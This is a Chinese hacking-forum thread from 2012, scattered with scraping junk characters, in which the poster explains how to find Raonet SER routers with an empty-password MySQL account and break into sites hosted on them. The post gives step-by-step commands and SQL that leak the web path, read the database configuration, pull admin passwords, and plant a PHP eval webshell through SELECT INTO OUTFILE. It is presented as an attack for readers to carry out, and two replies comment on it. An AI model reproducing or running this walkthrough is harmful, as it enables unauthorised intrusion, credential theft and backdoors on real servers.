找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3033|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
+ v. v! }4 V/ Z5 [
6 [4 F' O" U; b8 q! h$ [/ m1:google搜索'Raonet Subscriber Ethernet Router'
& w- |' I$ N2 ?" ~0 J* U# \' u& Q# ^- ~% d' \
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20016 |5 l% Y4 y% x+ v' K

( M5 f/ R* J3 _3 V! V& k6 z; ?3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。( ~8 d) t' e; t1 |+ l- {% d) r: _
. ~# _# y8 `8 Z; p1 u9 h, r
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......9 w- B: k7 B! D6 |
- Z0 B* @! }- `/ |/ E* j, Y+ i

$ N% C, p% D" n. |$ T* a
5 B$ f8 U/ }: z7 N5 s入侵步骤:
0 n  ~' o1 p6 i* R1 o$ n: v8 v( S
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php( U3 h3 c- c- y
4 |' e2 F7 I2 r
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
/ p& V: B" g' r. L3:得到密码后连接,查看GUI管理密码:+ Q5 _8 y* z& ]+ V: B
use ser_500
  [  W: G& q; t' iselect id,passwd from user;
" e0 c1 t! E: h) g  i4:通过数据库写入webshell,执行命令:
4 T* b# D; v  m: ?( g7 Quse mysql;# ^" ^  Q7 _% ?( p
create table ok(cmd TEXT);
0 \' k6 [+ J! I8 v' [6 rinsert into ok values("<?php @eval($_POST[cmd])?>");* `  U/ r6 O7 Y2 r
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";; o4 y8 v8 q9 i$ B0 S! F9 D
drop table ok;
, j0 Z; o* D7 ^  c3 B# t3 j+ M
5 z/ @4 d: R$ M5:连接后门shell.php
+ `6 W2 d5 L, {3 L; P7 Z+ F3 }7 p. `# c2 F0 D( R
6. 搞定!  W( J- c! @# p

( I  W* W* f: G# K4 x% {0 u. t
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表